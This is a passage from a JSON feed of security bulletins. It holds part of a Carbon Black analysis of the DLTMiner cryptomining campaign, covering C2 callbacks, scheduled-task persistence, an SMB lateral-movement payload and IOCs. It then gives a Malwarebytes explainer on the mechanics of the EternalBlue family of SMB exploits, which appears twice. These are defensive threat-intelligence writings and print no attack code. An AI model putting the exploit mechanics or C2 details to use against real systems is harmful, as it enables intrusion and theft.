The response was expected to be a string, that was base64 encoded. A scheduled task, named **Winnet**, is then created to run every 45 minutes, which will execute PowerShell and the base64 encoded payload from the C2 site. The only difference in the two instances is whether the scheduled task runs as under the context of the \u201csystem\u201d or not. All of this activity is highlighted in blue below. \n\n_![Figure_8.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2292i6FD67FDCC1F5DCEF/image-size/large?v=1.0&px=999)___\n\n_Figure 8: C2 Communications_\n\nAt the time of this analysis the C2 site **hXXP://cdn.chatcdn[.]net** was not actively responding to request. It should be noted that originally this domain was resolving to the IP Address 134[.]209.103.152, which was the secondary C2 in this specific script, beginning on April 29, 2019. On approximately May 14, 2019, this domain was parked at 0[.]0.0.0, which is a common technique. However on approximately May 15, 2019 the domain began resolving to 74[.]119.239.234, which appears to be either a public-domain parking IP Address or less likely a sinkhole. TAU was unable to find a sample of the response from the server when it was originally responding to request. However directly making request to the original IP address, where the C2 resolved will return a payload which is described in a later section. \n\nResolved IP\n\n| \n\nFirst Observed \n \n---|--- \n \n74[.]119.239.234\n\n| \n\n5/15/19 20:41 \n \n0[.]0.0.0\n\n| \n\n5/14/19 1:58 \n \n134[.]209.103.152\n\n| \n\n4/29/19 5:33 \n \n_Table 4: Domain Name Resolution_\n\nIf the ccc.log file exists on the system, which from the flow of the script will always occur as the previous conditional statement creates the file it did not exist, then the script will reach out to a secondary C2. This activity is highlighted in green in the image above. 
The script will reach out to 134[.]209.103.152 and request \u201c**update?**\u201d with the system information string that was created in the first portion of the analysis. The response as of this testing was an additional PowerShell script that would be executed, via cmd.exe, which will launch PowerShell and the third stage payload. It should be noted that TAU was able to locate a payload that was being provided from that same C2 on May 16, 2019. In both those instances the metadata for the file was the same, which is listed in the table below. \n\nFile Name : Third_Stage\n\nFile Size : 3,110,651 bytes\n\nMD5 : 500a3b178af4d066a88a27edf1a278c0\n\nSHA256 : 1756723b89788ba0f53ce9752e40ae50c7545c8993d4ca08768463289a73a53b \n \n--- \n \n_Table 5: Third Stage Payload_\n\n## Third Stage Payload\n\nA small subset of the third stage payload that is downloaded from 134[.]209.103.152, is depicted in the image below. The script uses reverse order, character replacement, and other standard obfuscation techniques to deter analysis.\n\n![Figure_9.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2293i35403672A35FC8AA/image-size/large?v=1.0&px=999)__\n\n_Figure 9: Third Stage Payload_\n\nTAU was able to decode the script (to a reasonable degree), which appears to be a variant of an open source script used to exploit SMB vulnerabilities for lateral movement, commonly referred to as Invoke-SMBExec. The script contains an embedded PE file, that is base64 encoded, that appears to be a version of Mimikatz. Due to some of the errors in the decoding process that could not be confirmed.\n\n## Campaign\n\n### Initial Campaign\n\nThe initial campaign that is related to this incident was disclosed in January of 2019 by 360.cn. In that campaign there was overlap in the manner in which PowerShell scripts were formatted and variables set. 
Additionally the manner in which the request and data was being sent to the C2 server aligns with what was observed in the current campaign. This initial campaign appears to have been active from January 2019 throughout February of 2019, and targeting organizations in China.\n\nAdditionally there was a campaign that was documented in April, that was also attributed to the original campaign. In this campaign organizations in Japan, Australia, Taiwan, Vietnam, Hong Kong, and India were being targeted for Monero cryptocurrency mining. In this campaign different artifacts from the PowerShell scripts being used, the exploitation of SMB vulnerabilities, reflective injection of payloads, and C2 communication structure aligns with what was observed in the ongoing campaign. This portion of the larger campaign occurred in the March and April 2019 time frames.\n\n**Ongoing Campaign**\n\nTAU was able to track an ongoing campaign that was related to the truncated command that was submitted in this escalation. In this latest portion of the campaign organizations in Asia were being targeted. TAU identified two potential victims, which were both hospitals one located in Vietnam and the United States. The script that was submitted overlaps in C2 infrastructure to at least 3 others scripts that were located in public repositories. In the image below, the submitted script is located at the top left of the image. C2 communications are depicted in dotted red lines, while URL resolutions are in orange lines. 
Files that are being served up by different C2s are list in dotted blue lines.![Figure_10.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2294iFB71C6C2B19E5E75/image-size/large?v=1.0&px=999)__\n\n_Figure 10: Campaign Overview_\n\n**Remediation:**\n\n## **MITRE ATT&amp;CK TIDs **\n\n**TID**\n\n| \n\n**Tactic**\n\n| \n\n**Description** \n \n---|---|--- \n \nT1110\n\n| \n\nCredential Access\n\n| \n\n**Brute Force: **It was previously reported that DLTMiner campaigns was utilizing RDP brute forcing for initial access. \n \nT1190\n\n| \n\nInitial Access\n\n| \n\n**Exploit Public-Facing Application:** Eternal Blue vulnerability was also reported to be used in connection with this campaign \n \nT1086\n\n| \n\nExecution\n\n| \n\n**PowerShell:** PowerShell is heavily leveraged \n \nT1053\n\n| \n\nPersistence\n\n| \n\n**Scheduled Tasks:** Persistence is maintained via scheduled tasks \n \nT1210\n\n| \n\nLateral Movement\n\n| \n\nSMB: One of the additional payloads will enumerate lateral systems and attempt to exploit the eternal blue vulnerabilites \n \n \n\n## IOCs\n\nRelated Sample Hashes \n \n--- \n \n0c3f63af1e35d1b384a01d8caa8c49d6c7946affe1386a697079c352b76eaeef\n\n| \n\nRelated PowerShell Script \n \n21d783d08299b73f24a7cc20c3e5b43b13c06aea1bf9caca66aef09799719598\n\n| \n\nRelated PowerShell Script \n \n1b987ba4983d98a4c2776c8afb5aebbe418cdea1a7d4960c548fb947d404e4b2\n\n| \n\nRelated PowerShell Script \n \n1756723b89788ba0f53ce9752e40ae50c7545c8993d4ca08768463289a73a53b\n\n| \n\nLateral Movement Script \n \n134.209.103.152\n\n| \n\nC2 \n \ncdn.chatcdn.net\n\n| \n\nC2 \n \n206.189.87.176\n\n| \n\nPotential Parking IP Address \n \nexplorer.sombewallet.tk\n\n| \n\nC2 \n \n134.209.103.236\n\n| \n\nC2 \n \np.estonine.com\n\n| \n\nC2 \n \n128.199.99.33\n\n| \n\nC2 \n \nThe post [CB TAU Technical Analysis: DLTMiner Campaign Targeting Corporations in 
Asia](<https://www.carbonblack.com/2019/07/23/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-07-23T14:42:33", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-07-23T14:42:33", "rev": 2, "value": 7.1, "vector": "NONE"}}, "hash": "5e05ddf457dd86f964467b8cb9a99daf87f2304078367f280586b4362c195e78", "hashmap": [{"hash": "6101e9f771e61bdfabc16c72de3bc4c0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "4d7c56a2d2ea0a8d03229d75af6c9cc6", "key": "reporter"}, {"hash": "807b338c137f68e7a8be7b0d14b1be6b", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": "32ae473f1e2110324d79ae9eafed33a8", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": 
"786924bd5317723ff221ebbab8ef99bc", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "786924bd5317723ff221ebbab8ef99bc", "key": "published"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "24b2b1d79a96c55d12baea27902490f4", "key": "type"}], "history": [], "href": "https://www.carbonblack.com/2019/07/23/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/", "id": "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D", "immutableFields": [], "lastseen": "2019-07-23T14:42:33", "modified": "2019-07-23T13:47:50", "objectVersion": "1.5", "published": "2019-07-23T13:47:50", "references": [], "reporter": "Ryan Murphy", "title": "CB TAU Technical Analysis: DLTMiner Campaign Targeting Corporations in Asia", "type": "carbonblack", "viewCount": 1163}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2019-07-23T14:42:33"}], "viewCount": 1329, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", 
"SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": 
["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2019-07-23T14:42:33", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2019-07-23T14:42:33", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.rss.RssBulletin", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "6101e9f771e61bdfabc16c72de3bc4c0"}, {"key": "href", "hash": "32ae473f1e2110324d79ae9eafed33a8"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": 
"786924bd5317723ff221ebbab8ef99bc"}, {"key": "published", "hash": "786924bd5317723ff221ebbab8ef99bc"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "4d7c56a2d2ea0a8d03229d75af6c9cc6"}, {"key": "title", "hash": "807b338c137f68e7a8be7b0d14b1be6b"}, {"key": "type", "hash": "24b2b1d79a96c55d12baea27902490f4"}], "scheme": null}], "malwarebytes": [{"id": "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "hash": "a43f1253ae9c28203a59cb9fa22c6a2ab63a9d2ffd5db8966ed452f8456cb09a", "type": "malwarebytes", "bulletinFamily": "blog", "title": "How threat actors are using SMB vulnerabilities", "description": "Some of the most devastating ransomware and Trojan malware variants depend on vulnerabilities in the Windows Server Message Block (SMB) to propagate through an organization\u2019s network. Windows SMB is a protocol used by PCs for file and printer sharing, as well as for access to remote services.\n\nA patch was released by Microsoft for SMB vulnerabilities in March 2017, but many organizations and home users have still not applied it. So now, the unpatched systems allow threats that take advantage of these vulnerabilities inside, helping active malware campaigns spread like Californian wildfire.\n\nSMB vulnerabilities have been so successful for threat actors that they\u2019ve been used in some of the most visible ransomware outbreaks and sophisticated Trojan attacks of the last two years. In fact, our product telemetry has recorded 5,315 detections of [Emotet](<https://blog.malwarebytes.com/cybercrime/2018/09/emotet-rise-heavy-spam-campaign/>) and 6,222 of [TrickBot](<https://blog.malwarebytes.com/101/2018/11/trickbot-takes-top-business-threat/>) in business networks\u2014two Trojan variants that are using the SMB vulnerabilities\u2014in the last 30 days alone.\n\n### What makes them so effective?\n\nWhat makes some malware so widespread is the way in which it propagates. 
While massive spam campaigns only render a few victims that actually pay off, a [worm](<https://blog.malwarebytes.com/threats/worm/>)-like infection that keeps spreading itself requires little effort for multiplying returns. And that\u2019s exactly what the SMB vulnerabilities allow their payloads to do: spread laterally through connected systems.\n\nFor example, WannaCry ransomware (also known as WannaCrypt), which used one of the SMB vulnerabilities, was launched in May 2017, yet the infection continues to expand. Below is the graph that shows our telemetry for [Ransom.WannaCrypt](<https://blog.malwarebytes.com/detections/ransom-wannacrypt/>) for the month of _November 2018_.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/12/SMB_graph-600x273.png)\n\nIt\u2019s been more than 1.5 years, and WannaCry continues to proliferate, thanks to the sheer number of unpatched machines connected to infected networks.\n\n### How did this come about?\n\nAt the moment, there are three exploits in the wild that use SMB vulnerabilities. These exploits have been dubbed EternalBlue (used by WannaCry and Emotet), EternalRomance (NotPetya, Bad Rabbit, and TrickBot), and EternalChampion. There is a fourth exploit called EternalSynergy, but we have only seen a Proof of Concept (PoC)\u2014nothing has appeared yet in the wild.\n\nAll these exploits were leaked by the [ShadowBrokers](<https://blog.malwarebytes.com/cybercrime/2017/04/shadowbrokers-fails-to-collect-1m-bitcoins-releases-stolen-information/>) Group, who allegedly stole them from the NSA. 
Less than a month after ShadowBrokers published their \u201cfindings,\u201d the first fully functional malware that used the EternalBlue exploit, WannaCry, was found in the wild.\n\nSince then, multiple large-scale malware attacks have relied on the SMB vulnerabilities to penetrate organizations\u2019 networks, including the NotPetya and Bad Rabbit ransomware campaigns in 2017, and now the Emotet and TrickBot Trojan attacks, which have been ongoing through the third and fourth quarter of 2018.\n\nLet\u2019s now take a closer, more technical look at each exploit and how they work.\n\n### EternalBlue\n\nA bug in the process of converting File Extended Attributes (FEA) from OS2 structure to NT structure by the Windows SMB implementation can lead to a buffer overflow in the non-paged kernel pool. This non-paged pool consists of virtual memory addresses that are guaranteed to reside in physical memory for as long as the corresponding kernel objects are allocated.\n\nA buffer overflow is a programming flaw that lets the data written to a reserved memory area (the buffer) go outside of bounds (overflow), allowing it to write data to adjacent memory locations. This means attackers are able to control the content of certain memory locations that they should not be able to access, which attackers then exploit to their advantage. In the case of EternalBlue, they are able to control the content of a heap that has execution permission, which leads to the Remote Code Execution (RCE) vulnerability, or the ability to execute commands on a target machine over the network.\n\n### EternalRomance\n\nEternal Romance is an RCE attack that exploits [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>) against the legacy SMBv1 file-sharing protocol. Please note that file sharing over SMB is normally used only on local networks, and the SMB ports are typically blocked from the Internet by a firewall. 
However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.\n\nAt the core of this exploit is a type confusion vulnerability. Type confusion vulnerabilities are programming flaws that happen when a piece of code doesn\u2019t verify the type of object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In some cases, this can lead to code execution.\n\nIn other cases, type confusion vulnerability leads to an arbitrary heap write, or heap spray. Heap spraying is a method typically used in exploits that places large amounts of code in a memory location that the attacker expects to be read. Usually, these bits of code point to the start of the actual code that the exploit wants to run in order to compromise the system that is under attack.\n\nAfter the spray has finished, the exploit uses an info leak in a TRANS_PEEK_NMPIPE transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.\n\n### EternalChampion\n\nThe issue exploited by EternalChampion is a race condition in how SMBv1 handles transactions. A race condition, or race hazard, is the behavior of a system where the output depends on the sequence or timing of other uncontrollable events. It becomes a bug when events do not happen in the order the programmer intended. Sometimes these bugs can be exploited when the outcome is predictable and works to the attackers\u2019 advantage.\n\nMeanwhile, a transaction is a type of request that can potentially span multiple packets. 
For example, if a request is too large to fit in a single server message block (SMB), a transaction of the appropriate size can be created, and this will store the data as it is received from multiple SMBs.\n\nThis vulnerability is exploited in two ways: first for an information leak, and second for remote code execution. The bug is first exploited to leak pool information via an out-of-bounds read. To do this, a single packet containing multiple SMBs is sent to the server. This packet contains three relevant pieces:\n\n * A primary transaction request that will immediately be executed.\n * A secondary transaction request that triggers the bug caused by the race condition.\n * Sets of primary transactions that heap spray the pool with the intention to place a transaction structure immediately behind the one that tracks the first primary transaction request.\n\nFirst, a transaction is created that contains the shellcode. This does not start the exploit, it just contains the second stage payload. Next, a packet is sent that contains multiple SMBs. The packet contains all expected transaction data and immediately begins execution.\n\nThe secondary transaction handler copies the secondary transaction request\u2019s data if it fits in the buffer. Except due to the race condition, the pointer now points to the stack of the primary transaction request handlers\u2019 thread (as opposed to the expected pool buffer). This allows an attacker to write their data directly to the stack of another thread.\n\nThe attacker has control over the displacement, so they can choose the amount of data to copy and then copy it. This allows them to precisely overwrite a return address stored on the stack of the primary transaction request handler\u2019s thread, and results in the ability for Remote Code Execution.\n\n### EternalSynergy\n\nThe Proof of Concept for EternalSynergy shows that incoming SMB messages are copied by an initial handler into the corresponding transaction buffer. 
But the handler automatically assumes that the provided address is the beginning of the buffer. However, during a write transaction, the same address is automatically assumed to be the end of the existing data, and the address pointing to the beginning of the buffer is updated accordingly.\n\nThis means that an attacker can construct a secondary message in the transaction to point beyond the start of the buffer, resulting in a buffer overflow during the copy action.\n\n### EternalRocks\n\nLooking for information about these SMB exploits, you may also run into an exploit called EternalRocks. EternalRocks was not included in the ShadowBrokers release, but was instead constructed and discovered later. EternalRocks uses seven NSA tools where, for example, WannaCry only used two (EternalBlue and another called DoublePulsar).\n\n### **Prevention and** remediation\n\nDespite the significant power SMB vulnerabilities afford to attackers, there is one simple remedy to prevent them from ever becoming problematic.\n\nPatch your systems.\n\nThe Windows Operating Systems vulnerable to the attacks found in the wild all predate Windows 10. Most attacks work only on Windows 7 and earlier, and Microsoft released patches for the vulnerabilities that were leaked under the [Microsoft Security Bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>). This leaves little-to-no reason for networks to be vulnerable to these attacks, yet the number of current victims is overwhelming.\n\nBy applying the patch released by Microsoft in 2017, all your eternal headaches can magically disappear. 
And for extra measure, we also recommend you patch and update all systems, browsers, and software as soon as possible to shore up any other potential vulnerabilities in the network.\n\nIn addition, many cybersecurity solutions, including [Malwarebytes Endpoint Protection](<https://www.malwarebytes.com/business/endpointprotection/>), offer innovative anti-exploit technology that can block threats such as EternalBlue from ever dropping their payloads and infecting systems.\n\nFor example, Malwarebytes\u2019 anti-exploit module detected WannaCry as [Ransom.WannaCrypt](<https://blog.malwarebytes.com/detections/ransom-wannacrypt/>) right from the start. Below, we created a heat map using our telemetry, showing where the infection started and how fast it spread across the globe.\n\nIt is for good reason that most cybersecurity guides advise users to patch quickly and keep systems updated. So many of the infections seen today could be avoided with consistent monitoring and basic computer maintenance. Unfortunately, a lot of businesses believe they do not have the time or manpower to follow this advice. But when companies leave their networks unprotected, they compromise the integrity of all of our online experiences\u2014especially when SMB vulnerabilities allow infections to spread so quickly.\n\nDon\u2019t be one of those companies. 
Get protected and stay updated!\n\nThe post [How threat actors are using SMB vulnerabilities](<https://blog.malwarebytes.com/101/2018/12/how-threat-actors-are-using-smb-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "published": "2018-12-14T16:00:00", "modified": "2018-12-14T16:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blog.malwarebytes.com/101/2018/12/how-threat-actors-are-using-smb-vulnerabilities/", "reporter": "Pieter Arntz", "references": [], "cvelist": ["CVE-2017-0145"], "lastseen": "2018-12-14T17:47:19", "history": [{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "Some of the most devastating ransomware and Trojan malware variants depend on vulnerabilities in the Windows Server Message Block (SMB) to propagate through an organization\u2019s network. Windows SMB is a protocol used by PCs for file and printer sharing, as well as for access to remote services.\n\nA patch was released by Microsoft for SMB vulnerabilities in March 2017, but many organizations and home users have still not applied it. So now, the unpatched systems allow threats that take advantage of these vulnerabilities inside, helping active malware campaigns spread like Californian wildfire.\n\nSMB vulnerabilities have been so successful for threat actors that they\u2019ve been used in some of the most visible ransomware outbreaks and sophisticated Trojan attacks of the last two years. 
In fact, our product telemetry has recorded 5,315 detections of [Emotet](<https://blog.malwarebytes.com/cybercrime/2018/09/emotet-rise-heavy-spam-campaign/>) and 6,222 of [TrickBot](<https://blog.malwarebytes.com/101/2018/11/trickbot-takes-top-business-threat/>) in business networks\u2014two Trojan variants that are using the SMB vulnerabilities\u2014in the last 30 days alone.\n\n### What makes them so effective?\n\nWhat makes some malware so widespread is the way in which it propagates. While massive spam campaigns only render a few victims that actually pay off, a [worm](<https://blog.malwarebytes.com/threats/worm/>)-like infection that keeps spreading itself requires little effort for multiplying returns. And that\u2019s exactly what the SMB vulnerabilities allow their payloads to do: spread laterally through connected systems.\n\nFor example, WannaCry ransomware (also known as WannaCrypt), which used one of the SMB vulnerabilities, was launched in May 2017, yet the infection continues to expand. Below is the graph that shows our telemetry for [Ransom.WannaCrypt](<https://blog.malwarebytes.com/detections/ransom-wannacrypt/>) for the month of _November 2018_.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/12/SMB_graph-600x273.png)\n\nIt\u2019s been more than 1.5 years, and WannaCry continues to proliferate, thanks to the sheer number of unpatched machines connected to infected networks.\n\n### How did this come about?\n\nAt the moment, there are three exploits in the wild that use SMB vulnerabilities. These exploits have been dubbed EternalBlue (used by WannaCry and Emotet), EternalRomance (NotPetya, Bad Rabbit, and TrickBot), and EternalChampion. 
